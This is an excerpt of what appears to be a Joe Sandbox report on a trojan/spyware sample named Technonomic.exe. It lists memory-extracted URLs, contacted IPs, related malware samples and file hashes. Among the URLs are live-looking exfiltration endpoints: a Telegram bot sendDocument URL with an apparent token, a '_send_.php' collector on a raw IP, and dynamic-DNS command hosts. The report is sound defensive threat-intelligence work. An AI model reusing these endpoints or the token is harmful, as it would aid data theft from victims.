                                              https://api.telegram.org/botmsiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.office.com/lBmsiexec.exe, 00000007.00000002.2620412422.00000000259D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://drive.usercontent.google.com/msiexec.exe, 00000007.00000003.2141034784.0000000009F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.orgmsiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://nsis.sf.net/NSIS_ErrorErrorTechnonomic.exe, Technonomic.exe.2.drfalse
                                                              high
                                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000007.00000002.2620412422.00000000259AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.ecosia.org/newtab/msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://varders.kozow.com:8081msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://api.telegram.org/bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://aborters.duckdns.org:8081msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ac.ecosia.org/autocomplete?q=msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.google.commsiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20amsiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://51.38.247.67:8081/_send_.php?Lmsiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://drive.google.com/msiexec.exe, 00000007.00000002.2606714921.0000000009EEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://anotherarmy.dns.army:8081msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 00000007.00000002.2620412422.00000000259A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://reallyfreegeoip.org/xml/8.46.123.189$msiexec.exe, 00000007.00000002.2620412422.00000000258AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.0000000025865000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://reallyfreegeoip.orgmsiexec.exe, 00000007.00000002.2620412422.000000002583B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://apis.google.commsiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://api.telegram.orgmsiexec.exe, 00000007.00000002.2620412422.0000000025939000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://reallyfreegeoip.org/xml/msiexec.exe, 00000007.00000002.2620412422.000000002583B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs
                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        149.154.167.220
                                                                                                        api.telegram.orgUnited Kingdom
                                                                                                        62041TELEGRAMRUfalse
                                                                                                        172.217.19.238
                                                                                                        drive.google.comUnited States
                                                                                                        15169GOOGLEUSfalse
                                                                                                        142.250.181.1
                                                                                                        drive.usercontent.google.comUnited States
                                                                                                        15169GOOGLEUSfalse
                                                                                                        193.122.6.168
                                                                                                        checkip.dyndns.comUnited States
                                                                                                        31898ORACLE-BMC-31898USfalse
                                                                                                        172.67.177.134
                                                                                                        reallyfreegeoip.orgUnited States
                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1580360
                                                                                                        Start date and time:2024-12-24 11:26:09 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 6m 47s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:10
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:Technonomic.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@6/16@5/5
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 50%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 98%
                                                                                                        • Number of executed functions: 89
                                                                                                        • Number of non-executed functions: 26
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Execution Graph export aborted for target msiexec.exe, PID 7192 because it is empty
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                        • VT rate limit hit for: Technonomic.exe
                                                                                                        TimeTypeDescription
                                                                                                        05:27:07API Interceptor43x Sleep call for process: powershell.exe modified
                                                                                                        05:28:28API Interceptor917x Sleep call for process: msiexec.exe modified
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        149.154.167.220Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                setup.exeGet hashmaliciousBabadedaBrowse
                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                    user.exeGet hashmaliciousUnknownBrowse
                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                          8v1GZ8v1LF.exeGet hashmaliciousUnknownBrowse
                                                                                                                            193.122.6.168HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            YU SV Payment.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            172.67.177.134HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                              EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                    rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        YU SV Payment.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                              66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                checkip.dyndns.comHALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 132.226.8.169
                                                                                                                                                HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 132.226.8.169
                                                                                                                                                MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 193.122.130.0
                                                                                                                                                Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.130.0
                                                                                                                                                rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.130.0
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 158.101.44.242
                                                                                                                                                s-part-0035.t-0009.t-msedge.nethttp://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                                                • 13.107.246.63
                                                                                                                                                https://www.bing.com/search?pglt=41&q=%E5%B9%B3%E6%88%9031%E5%B9%B4+%E8%A5%BF%E6%9A%A6&cvid=467cba4c80be484e858dd735013f0921&gs_lcrp=EgRlZGdlKgYIARAAGEAyBggAEEUYOTIGCAEQABhAMgYIAhAAGEAyBggDEAAYQDIGCAQQABhAMgYIBRAAGEAyBggGEAAYQDIGCAcQABhAMgYICBAAGEAyCAgJEOkHGPxV0gEINjUyMGowajGoAgCwAgE&FORM=ANNAB1&PC=U531Get hashmaliciousUnknownBrowse
                                                                                                                                                • 13.107.246.63
                                                                                                                                                pwn.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                • 13.107.246.63
                                                                                                                                                7kf4hLzMoS.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                • 13.107.246.63
                                                                                                                                                2S5jaCcFo5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 13.107.246.63
                                                                                                                                                QDQXUZhiY3.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                • 13.107.246.63
                                                                                                                                                https://en.newsnowbangla.com/archives/69912Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                                                                • 13.107.246.63
                                                                                                                                                https://flowto.it/8tooc2sec?fc=0Get hashmaliciousUnknownBrowse
                                                                                                                                                • 13.107.246.63
                                                                                                                                                Onboard Training Checklist v1.1 - Wyatt Young (1).xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                • 13.107.246.63
                                                                                                                                                vFile__0054seconds__Airborn.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 13.107.246.63
                                                                                                                                                api.telegram.orgProforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                setup.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                user.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                8v1GZ8v1LF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                reallyfreegeoip.orgHALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                ORACLE-BMC-31898USHALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                splm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 129.147.168.111
                                                                                                                                                EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 193.122.130.0
                                                                                                                                                Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.130.0
                                                                                                                                                rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.130.0
                                                                                                                                                nshkmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 132.145.36.70
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 158.101.44.242
                                                                                                                                                TELEGRAMRUProforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 149.154.167.99
                                                                                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 149.154.167.99
                                                                                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 149.154.167.99
                                                                                                                                                gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 149.154.167.99
                                                                                                                                                trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 149.154.167.99
                                                                                                                                                9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 149.154.167.99
                                                                                                                                                tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                CLOUDFLARENETUSfnCae9FQhg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.21.36.201
                                                                                                                                                bG89JAQXz2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.21.36.201
                                                                                                                                                SFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.21.36.201
                                                                                                                                                https://app.salesforceiq.com/r?target=631f420eed13ca3bcf77c324&t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&url=https://monaghans.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 162.159.128.70
                                                                                                                                                https://office356quilter.krkonqghz.ru/Vt2VD2f3#https://outlookofficecom/mail/deleteditems/id/AAQkADU5#aGVpZGkuZGlsa0BxdWlsdGVyLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                • 104.21.17.63
                                                                                                                                                http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                                                • 172.67.207.202
                                                                                                                                                eCompleted_419z.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 104.21.112.1
                                                                                                                                                3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 172.67.157.254
                                                                                                                                                oiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.21.66.86
                                                                                                                                                L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 172.67.157.254
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                54328bd36c14bd82ddaa0c04b25ed9adHALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eGq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Gq48hjKhZf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                singl6.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                WO.exeGet hashmaliciousMetasploitBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                payment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                1lhZVZx5nD.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                37f463bf4616ecd445d4a1937da06e19installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                • 142.250.181.1
                                                                                                                                                • 172.217.19.238
                                                                                                                                                Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 142.250.181.1
                                                                                                                                                • 172.217.19.238
                                                                                                                                                Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 142.250.181.1
                                                                                                                                                • 172.217.19.238
                                                                                                                                                3gPZmVbozD.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                • 142.250.181.1
                                                                                                                                                • 172.217.19.238
                                                                                                                                                fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                • 142.250.181.1
                                                                                                                                                • 172.217.19.238
                                                                                                                                                ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 142.250.181.1
                                                                                                                                                • 172.217.19.238
                                                                                                                                                Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                • 142.250.181.1
                                                                                                                                                • 172.217.19.238
                                                                                                                                                Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                • 142.250.181.1
                                                                                                                                                • 172.217.19.238
                                                                                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 142.250.181.1
                                                                                                                                                • 172.217.19.238
                                                                                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 142.250.181.1
                                                                                                                                                • 172.217.19.238
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dllAzygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  WYnv59N83j.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                    t6V3uvyaAP.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      WYnv59N83j.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        t6V3uvyaAP.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                          Unspuriousness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            Unspuriousness.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                  SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):53158
                                                                                                                                                                    Entropy (8bit):5.062687652912555
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                                                    MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                                                    SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                                                    SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                                                    SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:moderate, very likely benign file
